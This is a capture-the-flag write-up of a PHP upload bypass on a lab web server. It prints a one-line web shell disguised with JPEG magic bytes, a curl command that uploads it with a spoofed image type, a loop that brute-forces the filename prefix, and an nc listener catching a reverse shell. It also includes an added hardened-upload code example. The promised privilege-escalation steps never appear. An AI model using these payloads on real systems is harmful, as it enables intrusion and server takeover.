Alzymer

This challenge focused on a web application and its subdirectories. The vulnerabilities were an exposed internal file, a writeable file on the system, and a CVE used for privilege escalation (PE).


Recon

nmap

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.67 ((Debian))
|_http-title: Yekolo Temari College
|_http-server-header: Apache/2.4.67 (Debian)


FFUF

index.php 
media     
uploads     
assets   
student.php  
.html       

I enumerated each directory:

ffuf -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -u http://uni.ctf/media/FUZZ  -ac -e .php,.html,.bak,.zip
ffuf -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -u http://uni.ctf/media//images/FUZZ  -ac -e .php,.html,.bak,.zip

That turned up index.html; the interesting thing is in assets:

ffuf -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -u http://uni.ctf/assets/FUZZ  -ac -e .php,.html,.bak,.zip

backup.zip. OK, download it and extract the contents:

└─$ wget http://uni.ctf/assets/backup.zip                            
┌──(neo@neo-localhost)-[~/uni-ctf/]
└─$ ls
backup.zip                                
┌──(neo㉿neo)-[~/uni-ctf/]
└─$ unzip backup.zip
Archive:  backup.zip
   creating: backup/
  inflating: backup/index.php        
  inflating: backup/student.php      
┌──(neo@neo-localhost)-[~/uni-ctf/]
└─$  cd backup && ls
index.php  student.php
┌──(neo㉿neo)-[~/uni-ctf/backup]
└─$ 

What we have now is the PHP upload process:

$ cat student.php
<?php
$message = '';
$status = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $name = trim($_POST['full_name'] ?? '');
    $email = trim($_POST['email'] ?? '');
    $department = trim($_POST['department'] ?? '');
    if (!isset($_FILES['student_image']) || $_FILES['student_image']['error'] !== UPLOAD_ERR_OK) {
        $message = 'Please upload your image.';
        $status = 'error';
    } else {
        $allowed = ['image/jpeg', 'image/png'];
        $type = $_FILES['student_image']['type'] ?? '';
        if (!in_array($type, $allowed, true)) {
            $message = 'Only PNG or JPEG requeired.';
            $status = 'error';
        } else {
            $uploadDir = __DIR__ . '/uploads/';
            if (!is_dir($uploadDir)) {
                mkdir($uploadDir, 0777, true);
            }
            $originalName = basename($_FILES['student_image']['name']);
            $random = str_pad((string)random_int(100, 999), 3, '0', STR_PAD_LEFT);
            $savedName = 'yekolo-temari-' . $random . $originalName;
            $target = $uploadDir . $savedName;
            if (move_uploaded_file($_FILES['student_image']['tmp_name'], $target)) {
                $message = 'Thank you for registration we will contact u with your email';
                $status = 'success';
            } else {
                $message = 'Upload failed. Try again later.';
                $status = 'error';
            }
        }
    }
}

From this code we understand the process goes as follows:

  • Read the form fields
  • Check that an upload exists
  • Check the client-reported MIME type ($_FILES['student_image']['type'], which the client controls)
  • Create uploads/ if needed
  • Rename the file (a 3-digit random prefix plus the original filename, extension included)
  • Move the uploaded file
  • Show success
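For comparison, here is how the upload branch of student.php would look with the three weaknesses above closed: the MIME type is detected from the file contents rather than taken from the client, the original filename (and its extension) is discarded in favour of a random name with a fixed image extension, and the file is stored in a directory Apache does not execute scripts from. This is an added example, not the challenge's code; the function names and the /var/www/private_uploads path are assumptions for the example.

```php
<?php
// Added example: a hardened replacement for the upload branch of student.php.
// Not the challenge's code; helper names and the storage path are assumptions.

// Server-detected MIME type -> extension the file will be stored under.
const ALLOWED_IMAGE_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
];

/**
 * Validate one $_FILES entry and return the extension to store it under.
 * Throws RuntimeException on any failure. Never consults the client-supplied
 * 'type' or 'name' fields, which is what the original code trusted.
 */
function validateImageUpload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Please upload your image.');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Invalid upload.');
    }
    if ($file['size'] > 2 * 1024 * 1024) {
        throw new RuntimeException('Image too large (2 MB limit).');
    }
    // Sniff the content type from the bytes instead of $_FILES['type'].
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $detected = $finfo->file($file['tmp_name']);
    if (!isset(ALLOWED_IMAGE_TYPES[$detected])) {
        throw new RuntimeException('Only PNG or JPEG images are accepted.');
    }
    // A four-byte magic prefix is enough to satisfy finfo, so additionally
    // require the file to parse as an image whose type matches the sniff.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || ($info['mime'] ?? '') !== $detected) {
        throw new RuntimeException('File is not a valid image.');
    }
    return ALLOWED_IMAGE_TYPES[$detected];
}

/**
 * Store a validated upload under an unguessable name with a fixed extension.
 * $uploadDir should be outside the web root (assumed path below), so nothing
 * written here is ever reachable as a script.
 */
function storeImageUpload(array $file, string $uploadDir): string
{
    $ext = validateImageUpload($file);
    if (!is_dir($uploadDir) && !mkdir($uploadDir, 0750, true)) {
        throw new RuntimeException('Upload directory unavailable.');
    }
    // 128 bits of randomness replaces random_int(100, 999); the original
    // filename is dropped entirely, so a ".php" suffix can never survive.
    $savedName = bin2hex(random_bytes(16)) . '.' . $ext;
    $target = rtrim($uploadDir, '/') . '/' . $savedName;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('Upload failed. Try again later.');
    }
    chmod($target, 0640);
    return $savedName;
}

// Wiring into the original request flow.
$message = '';
$status = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    try {
        // Assumed location outside the document root; images are served back
        // through a read-only script rather than as static files.
        $saved = storeImageUpload($_FILES['student_image'] ?? [], '/var/www/private_uploads');
        $message = 'Thank you for registering, we will contact you by email.';
        $status = 'success';
    } catch (RuntimeException $e) {
        $message = $e->getMessage();
        $status = 'error';
    }
}
```

The content checks (finfo plus getimagesize) are defence in depth only; polyglot images can carry PHP inside metadata and still parse. The controls that actually decide the outcome are the discarded original extension and the storage location: if the files must stay under the web root, the equivalent Apache measure is a `<Directory>` block for uploads/ with `php_admin_flag engine off` (mod_php) or a `<FilesMatch "\.ph(p[0-9]?|tml)$">` block with `Require all denied`, so that even a file that does get a script extension is never executed.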

shell.php

\xFF\xD8\xFF\xE0<?php system($_GET["cmd"]); ?>
echo '\xFF\xD8\xFF\xE0<?php system($_GET["cmd"]); ?>' > shell.php
curl -X POST -F "full_name=test" -F "email=test@test.com" -F "department=Computer Science" -F "student_image=@shell.php;type=image/jpeg" http://uni.ctf/student.php
for i in $(seq 100 999); do                              
    url="http://uni.ctf/uploads/yekolo-temari-${i}shell.php"
    code=$(curl -s -o /dev/null -w "%{http_code}" "$url")
    if [ "$code" = "200" ]; then
        echo "[+] Found: $url"
        break
    fi
done
[+] Found: http://uni.ctf/uploads/yekolo-temari-996shell.php

?cmd=id

─$ curl -X POST -F "full_name=test" -F "email=test@test.com" -F "department=Computer Science" -F "student_image=@pentest.php;type=image/jpeg"  http://uni.ctf/student.php                          
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Student Registration</title>
<style>
 body{font-family:Arial,sans-serif;background:#f8fafc;padding:30px;color:#1e293b}
 .wrap{max-width:780px;margin:0 auto;background:#fff;border-radius:16px;padding:28px;box-shadow:0 10px 30px rgba(0,0,0,.08)}
 label{display:block;margin:14px 0 8px;font-weight:700}
 input,select{width:100%;padding:12px;border:1px solid #cbd5e1;border-radius:10px}
 button{margin-top:18px;background:#2563eb;color:#fff;border:0;padding:12px 18px;border-radius:10px;cursor:pointer}
 .msg{margin-bottom:16px;padding:14px;border-radius:10px}
 .success{background:#dcfce7;color:#166534}
 .error{background:#fee2e2;color:#991b1b}
 a{color:#2563eb}
</style>
</head>
<body>
<div class="wrap">
  <h1>Yekolo Temari College Registration</h1>
  <p>Fill the form below and upload your passport-size photo.</p>
      <div class="msg success">Thank you for registration we will contact u with your email</div>
    <form method="POST" enctype="multipart/form-data">
    <label>Full Name</label>
    <input type="text" name="full_name" required>

    <label>Email</label>
    <input type="email" name="email" required>

    <label>Department</label>
    <select name="department" required>
      <option value="Computer Science">Computer Science</option>
      <option value="Civil Engineering">Civil Engineering</option>
      <option value="Business Management">Business Management</option>
      <option value="Nursing">Nursing</option>
      <option value="CyberSecurity">CyberSecurity</option>
    </select>

    <label>Profile Image (JPEG or PNG)</label>
    <input type="file" name="student_image" required>

    <button type="submit">Submit Registration</button>
  </form>
  <p style="margin-top:20px"><a href="/index.php">Back to homepage</a></p>
</div>
</body>
</html>
                                                                                                                                                                        
┌──(neo㉿neo)-[~/pro/backup]
└─$ for i in $(seq 100 999); do                                                                                 
    url="http://uni.ctf/uploads/yekolo-temari-${i}pentest.php"
    code=$(curl -s -o /dev/null -w "%{http_code}" "$url")
    if [ "$code" = "200" ]; then
        echo "[+] Found: $url"
        break
    fi
done
^C                                                                                                                                                                        
┌──(neo㉿neo)-[~/pro/backup]
└─$ for i in $(seq 100 999); do                              
    url="http://uni.ctf/uploads/yekolo-temari-${i}pentest.php"
    code=$(curl -s -o /dev/null -w "%{http_code}" "$url")
    if [ "$code" = "200" ]; then
        echo "[+] Found: $url"
        break
    fi
done


─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.1.10] from (UNKNOWN) [192.168.1.8] 34012
Linux 49e853df1514 6.14.0-37-generic #37~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Nov 20 10:25:38 UTC 2 x86_64 GNU/Linux
 01:08:30 up 22:38,  0 users,  load average: 0.34, 0.37, 0.34
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU  WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ ls
bin
boot
dev
etc
flag.txt
home
...
var
$ cat flag.txt	
unictf{Br34king_TH3_rul3s}
This post is licensed under CC BY 4.0 by the author.